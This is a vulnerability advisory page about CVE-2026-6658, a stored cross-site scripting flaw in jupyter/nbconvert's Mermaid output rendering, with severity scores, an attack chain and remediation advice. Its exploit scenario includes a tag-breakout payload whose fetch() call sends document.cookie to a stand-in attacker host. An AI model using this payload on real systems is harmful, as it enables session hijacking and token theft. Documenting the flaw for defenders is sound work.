Skip to main content

Jupyter nbconvert CVE-2026-6658

| EUVDEUVD-2026-39642 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-26 @huntr_ai GHSA-9754-6rhw-gj3h
5.4
CVSS 3.0 · Vendor: huntr_ai
Share

Severity by source

Vendor (huntr_ai) PRIMARY
5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

PR:L reflects required notebook write access; UI:R reflects victim must view HTML export; S:C captures cross-browser-session impact; no availability impact applies.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
SUSE
MEDIUM
qualitative

Primary rating from Vendor (huntr_ai).

CVSS VectorVendor: huntr_ai

CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

1
Analysis Generated
Jun 26, 2026 - 10:16 vuln.today

DescriptionCVE.org

A vulnerability in jupyter/nbconvert versions <= 7.17.0 allows for Cross-site Scripting (XSS) via unsanitized text/vnd.mermaid output in HTML exports. The data_mermaid block in share/templates/lab/base.html.j2 renders text/vnd.mermaid cell output directly into HTML without escaping, enabling attackers to inject arbitrary HTML/JavaScript by breaking out of the <pre> tag. This vulnerability impacts any server using nbconvert to render notebooks as HTML, allowing attackers to execute arbitrary JavaScript in the context of users viewing the HTML export.

AnalysisAI

Cross-site scripting in jupyter/nbconvert versions 7.17.0 and earlier allows any user with notebook write access to inject and execute arbitrary JavaScript in the browsers of users who view HTML-exported notebooks. The flaw stems from the data_mermaid rendering block in share/templates/lab/base.html.j2, which outputs text/vnd.mermaid cell content directly into HTML without escaping, enabling tag breakout from the enclosing <pre> element. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain low-privilege notebook write access
Delivery
Craft malicious text/vnd.mermaid cell output with tag-breakout payload
Exploit
Notebook exported to HTML via nbconvert
Execution
Victim opens HTML export in browser
Persist
Injected JavaScript executes in victim's browser context
Impact
Exfiltrate session tokens or perform actions as victim

Vulnerability AssessmentAI

Exploitation Exploitation requires two concrete conditions: first, the attacker must have low-privilege write access to a Jupyter notebook - sufficient to set a cell's output MIME type to `text/vnd.mermaid` with attacker-controlled content (PR:L); second, a victim with a browser session must actively open or view an HTML file produced by nbconvert from that notebook (UI:R). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.0 base score of 5.4 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N reflects a stored-XSS pattern that is exploitable at low complexity but requires two preconditions: the attacker must hold low-privilege access to author or modify a notebook (PR:L), and a victim must actively render and view the HTML export (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with contributor access to a shared JupyterHub instance authors a notebook cell with `text/vnd.mermaid` output containing a payload such as `</pre><img src=x onerror=fetch('https://attacker.example/c?c='+document.cookie)>`. When a JupyterHub administrator or data reviewer exports the notebook to HTML using nbconvert and opens the resulting file in their browser, the injected script fires and exfiltrates the viewer's session cookies or JupyterHub authentication tokens to the attacker's server. …
Remediation Upgrade jupyter/nbconvert to any version released after 7.17.0 once a patched release is available; no exact fix version has been confirmed from the available references, so monitor the nbconvert PyPI release page and the Huntr advisory at https://huntr.com/bounties/47570290-3b26-4477-8cfa-fdef7db5aefe for the confirmed patch release. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Vendor StatusVendor

SUSE

Severity: Moderate

Share

CVE-2026-6658 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy